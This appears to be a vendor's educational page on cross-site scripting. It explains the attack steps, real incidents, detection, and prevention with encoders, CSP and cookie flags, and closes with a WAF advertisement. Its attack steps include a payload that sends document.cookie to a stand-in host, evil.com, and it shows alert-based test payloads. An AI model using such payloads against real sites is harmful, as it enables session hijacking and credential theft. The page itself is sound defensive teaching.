Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is an injection attack where malicious scripts are injected into trusted websites. When a user visits the compromised page, the script executes in their browser, allowing attackers to steal session tokens, redirect users, deface content, or perform actions on behalf of the victim.
How Cross-Site Scripting (XSS) Works
XSS exploits the trust a user's browser places in content received from a website. When an application includes untrusted data in its output without proper encoding, attackers can inject executable scripts.
Find an unsanitized output
The attacker identifies a point where user-supplied data is reflected in HTML without proper encoding — a search result, comment field, URL parameter, or error message.
Inject a script payload
A malicious script tag or event handler is crafted, such as <script>document.location='https://evil.com/?c='+document.cookie</script>, and submitted through the vulnerable input.
Victim triggers execution
When a victim loads the page containing the injected script (via a crafted link, stored comment, or manipulated DOM), their browser executes the malicious code as if it were legitimate site content.
Exploit the session
The script steals cookies, session tokens, or credentials and sends them to the attacker's server. It can also modify page content, redirect users, or perform API calls on behalf of the victim.
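The four steps above hinge on one thing: untrusted input reaching the HTML output without encoding. The following is an added example (not code from the original page) that renders the same reflection point two ways and checks the result; the attacker input is the one the page's own code example uses, and the function names and the tag-counting check are this example's own.

```javascript
// Added example: a reflected search result rendered without and with
// HTML-body-context encoding. Names and checks here are illustrative.

// Constructed attacker input: the same payload as the page's Code Examples.
const ATTACK_INPUT = '<img src=x onerror=alert(document.cookie)>';

// Encode the five characters that carry meaning in an HTML text node or a
// quoted attribute value. This is HTML entity encoding and is correct for
// those two contexts only (a <script> block or a URL needs its own encoder).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// VULNERABLE: the raw query is interpolated into the markup, exactly like
// the ${userQuery} template shown later on this page.
function renderSearchVulnerable(userQuery) {
  return `<div class="search-results"><p>Results for: ${userQuery}</p></div>`;
}

// HARDENED: identical markup, but the query is encoded for the HTML body,
// so the browser shows the payload as text instead of creating an <img>.
function renderSearchSafe(userQuery) {
  return `<div class="search-results"><p>Results for: ${escapeHtml(userQuery)}</p></div>`;
}

// A coarse structural check for a test suite: how many element start tags
// appear in the rendered page beyond those the empty template contains?
// Anything above zero came from the user-controlled value.
function attackerControlledTags(html, template) {
  const startTags = (s) => (s.match(/<[a-zA-Z]/g) || []).length;
  return startTags(html) - startTags(template);
}

// The template rendered with an empty query: the baseline for the check.
const EMPTY_TEMPLATE = renderSearchSafe('');

function demo() {
  console.log('vulnerable:', renderSearchVulnerable(ATTACK_INPUT));
  console.log('hardened:  ', renderSearchSafe(ATTACK_INPUT));
  console.log('extra tags, vulnerable:',
    attackerControlledTags(renderSearchVulnerable(ATTACK_INPUT), EMPTY_TEMPLATE));
  console.log('extra tags, hardened:  ',
    attackerControlledTags(renderSearchSafe(ATTACK_INPUT), EMPTY_TEMPLATE));
}

demo();
```

Run it with `node` and compare the two outputs: the vulnerable render contains a live `<img ... onerror=...>` element, while the hardened render contains only `&lt;img ...&gt;`, which the browser displays as text. The tag-count check is the kind of assertion an integration test can make over rendered pages without a browser.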
Real-World Examples
Samy worm (MySpace)
A stored XSS worm spread across MySpace, adding over 1 million friends to the attacker's profile in under 24 hours. It was the fastest-spreading worm of all time.
British Airways Magecart attack
Attackers injected a malicious script into BA's payment page, stealing credit card data from 380,000 transactions over 15 days. BA was fined £20 million by the ICO.
Fortnite SSO vulnerability
An XSS vulnerability in Epic Games' authentication flow could have allowed attackers to take over any Fortnite player account, affecting over 200 million users.
Impact & Risk Assessment
XSS attacks can lead to session hijacking, account takeover, credential theft, defacement, malware distribution, and phishing. Stored XSS is particularly dangerous as it affects every user who views the compromised page. In e-commerce contexts, XSS enables Magecart-style attacks that silently steal payment data at scale.
How to Detect Cross-Site Scripting (XSS)
Implement Content Security Policy (CSP) headers and monitor for violation reports. Review server logs for script tags and encoded payloads in request parameters. Use browser developer tools to inspect for unexpected inline scripts. Deploy WAF rules targeting common XSS vectors. Monitor DOM mutations for unexpected script injections. Look for encoded variants of script tags (for example the URL-encoded %3Cscript%3E or an HTML-entity-encoded <script>) and for JavaScript event handlers in unexpected contexts.
How to Prevent Cross-Site Scripting (XSS)
Encode all user-supplied output using context-aware encoding (HTML entity, JavaScript, URL, CSS encoding), choosing the encoder for the context the value lands in. Implement a strict Content Security Policy (CSP) that disallows inline scripts. Use HttpOnly and Secure flags on session cookies to prevent JavaScript access. Validate and sanitize input on the server side. Use modern frameworks with built-in auto-escaping (React, Angular, Vue). Apply the X-XSS-Protection header as a defense-in-depth measure, noting that current Chrome, Edge and Firefox ignore it (their built-in XSS auditors were removed), so it helps only legacy browsers and CSP is the control to rely on.
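"Context-aware" is the part of the first recommendation that is easiest to get wrong: HTML entity encoding protects a text node but not a value placed inside a `<script>` string literal or a URL. The following added example (not code from the original page) encodes one untrusted value for four output contexts and builds the session cookie with the flags named above; the encoder names, the page template and the cookie name are this example's own choices.

```javascript
// Added example: one untrusted value, four output contexts, each with the
// encoder that fits that context, plus a hardened Set-Cookie value.
// Function and cookie names are illustrative, not from any library.

// HTML text-node or quoted-attribute context.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute context where the quoting is not guaranteed: encode every
// non-alphanumeric as &#xHH; so no character can close the attribute.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^a-zA-Z0-9]/g,
    (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string-literal context: \xHH or \uHHHH for every
// non-alphanumeric UTF-16 unit, so neither a quote nor </script> survives.
function encodeForJsString(value) {
  return String(value).replace(/[^a-zA-Z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// URL query-parameter context: percent-encoding.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// A page that places the same untrusted value in all four contexts.
function renderProfile(displayName) {
  return [
    `<h1>${encodeForHtml(displayName)}</h1>`,
    `<input value="${encodeForHtmlAttribute(displayName)}">`,
    `<script>var name = "${encodeForJsString(displayName)}";</script>`,
    `<a href="/search?q=${encodeForUrlParam(displayName)}">search</a>`,
  ].join('\n');
}

// Session cookie with the flags the prevention list asks for. HttpOnly keeps
// document.cookie from reading it, Secure restricts it to HTTPS, and
// SameSite=Lax stops most cross-site submissions from carrying it.
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Count a literal substring, used to confirm the page keeps only its own
// <script> element whatever the input contains.
function countOccurrences(haystack, needle) {
  return haystack.split(needle).length - 1;
}

// Constructed input that tries to break out of every one of the contexts.
const PROBE = '"><script>alert(1)</script>';
console.log(renderProfile(PROBE));
console.log(sessionCookieHeader('constructed-token-value'));
```

The point of the probe at the end is that the rendered page still contains exactly one `<script>` element, the template's own, because each context received the encoder that matches it. Swapping `encodeForHtml` into the `<script>` line would leave `"` and `</script>` intact inside the string literal and reopen the hole, which is why a single "escape" helper is not enough.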
Code Examples
<!-- VULNERABLE: user input rendered directly -->
<div class="search-results">
  <p>Results for: ${userQuery}</p>
</div>
<!-- Attacker input: <img src=x onerror=alert(document.cookie)> -->
<!-- Renders executable HTML in the victim's browser -->
// Express.js — set strict CSP header
const express = require('express');
const app = express();

// Send the policy on every response: only same-origin scripts may run, so
// injected inline <script> blocks and event handlers are refused by the browser.
app.use((req, res, next) => {
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"
  );
  next();
});
PowerWAF automatically blocks Cross-Site Scripting (XSS) at the edge.
Deploy in minutes. No code changes required. Free plan available.
Free plan spots are limited